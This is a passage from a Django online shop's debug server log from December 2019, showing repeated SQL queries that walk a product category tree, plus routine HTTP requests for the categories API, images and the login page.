ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 07:49:58,896 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 07:49:58,899 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 07:49:58,901 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 07:49:58,904 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 07:49:58] "GET /api/v1/categories/ HTTP/1.0" 200 1769 [13/Dec/2019 07:49:59] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [13/Dec/2019 07:49:59] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 [13/Dec/2019 07:49:59] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 304 0 [13/Dec/2019 07:49:59] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 304 0 [13/Dec/2019 07:49:59] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 304 0 [13/Dec/2019 07:49:59] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 304 0 [13/Dec/2019 07:49:59] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 304 0 [13/Dec/2019 07:49:59] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 304 0 [13/Dec/2019 07:49:59] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 304 0 [13/Dec/2019 07:49:59] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 304 0 [13/Dec/2019 07:50:50] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 07:55:38,813 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 07:55:38,818 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 07:55:38,820 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 07:55:38,822 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 07:55:38,825 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 07:55:38,827 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 07:55:38,829 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 07:55:38,831 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 07:55:38,834 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 07:55:38,836 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 07:55:38,838 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 07:55:38] "GET /api/v1/categories/ HTTP/1.0" 200 1769 [13/Dec/2019 07:55:53] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 07:58:11,650 utils 11259 139831317362432 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 07:58:11,659 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 07:58:11,663 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 07:58:11,667 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 07:58:11,671 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 07:58:11,675 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 07:58:11,679 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 07:58:11,683 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 07:58:11,686 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 07:58:11,690 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 07:58:11,694 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 07:58:11] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 07:59:07,364 utils 11259 139831317362432 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 07:59:07,371 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 07:59:07,374 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 07:59:07,377 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 07:59:07,380 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 07:59:07,382 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 07:59:07,385 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 07:59:07,388 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 07:59:07,390 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 07:59:07,392 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 07:59:07,394 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 07:59:07] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 07:59:18,252 utils 11259 139831317362432 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 07:59:18,257 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 07:59:18,261 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 07:59:18,265 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 07:59:18,267 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 07:59:18,270 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 07:59:18,272 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 07:59:18,274 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 07:59:18,276 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 07:59:18,279 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 07:59:18,281 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 07:59:18] "GET /api/v1/categories/ HTTP/1.0" 200 1769 [13/Dec/2019 08:00:02] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 08:00:03,146 utils 11259 139831317362432 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '6jzn6qbluuvbiq05584lje788vh1mwkw' LIMIT 1; args=('6jzn6qbluuvbiq05584lje788vh1mwkw',) DEBUG 2019-12-13 08:00:03,148 utils 11259 139831317362432 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('6jzn6qbluuvbiq05584lje788vh1mwkw', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-27T08:00:03.147429+00:00'::timestamptz); args=('6jzn6qbluuvbiq05584lje788vh1mwkw', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 27, 8, 0, 3, 147429, tzinfo=)) [13/Dec/2019 08:00:03] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /index.php [13/Dec/2019 08:00:03] "GET /index.php HTTP/1.0" 404 6620 DEBUG 2019-12-13 08:00:09,879 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:00:09,885 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:00:09,888 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:00:09,891 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:00:09,894 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:00:09,898 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:00:09,902 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:00:09,906 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:00:09,910 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:00:09,914 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:00:09,917 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:00:09] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 08:00:30,099 utils 11259 139831317362432 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:00:30,106 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:00:30,111 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", 